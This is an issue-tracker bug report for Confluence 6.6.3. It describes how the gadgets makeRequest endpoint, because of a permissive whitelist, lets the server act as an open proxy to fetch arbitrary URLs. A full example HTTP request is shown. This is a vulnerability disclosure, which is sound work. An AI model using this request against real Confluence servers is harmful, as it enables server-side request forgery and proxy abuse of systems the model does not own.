Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Cannot Reproduce
Priority: Highest
Fix Version/s: None
Affects Version/s: 6.6.3
Component/s: Core - Content REST APIs
Labels:

Support reference count:
1
Symptom Severity:
Severity 2 - Major
Bug Fix Policy:
View Atlassian Server bug fix policy

Description

Confluence installations have permissive whitelist that allows to fetch any URL using confluence like as the proxy.

Use GET request GET /plugins/servlet/gadgets/makeRequest?url=

Example:
to get Yandex start page or any resource you want.

GET /plugins/servlet/gadgets/makeRequest?url=http://ya.ru HTTP/1.1
Host: xxxxxxxxxxxxxxxxxxxxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: s_cc=true; s_nr=1521467033623-New; s_vnum=1522558800623%26vn%3D1; s_sq=%5B%5BB%5D%5D
DNT: 1
X-Atlassian-Token: no-check
Connection: close
Upgrade-Insecure-Requests: 1

Update

This issue was fixed in Confluence version 4.2.14. If you are experiencing this issue in a newer version of Confluence then please check the configuration of the in product whitelist as per https://confluence.atlassian.com/doc/configuring-the-whitelist-381255821.html.

Attachments

Issue Links

has action: SECENG-1867 Loading...

mentioned in: Page Loading...; Page Loading...; Page Loading...

relates to: AG-1502 Loading...

Activity

People

Assignee:: Zhenhuan Zhou (Inactive)

Reporter:: Michael Weber

Votes:: 0 Vote for this issue

Watchers:: 7 Start watching this issue

Dates

Due:: 21/Aug/2018

Created:: 22/Jun/2018 2:31 PM

Updated:: 06/Apr/2022 12:41 AM

Resolved:: 10/Aug/2018 4:14 AM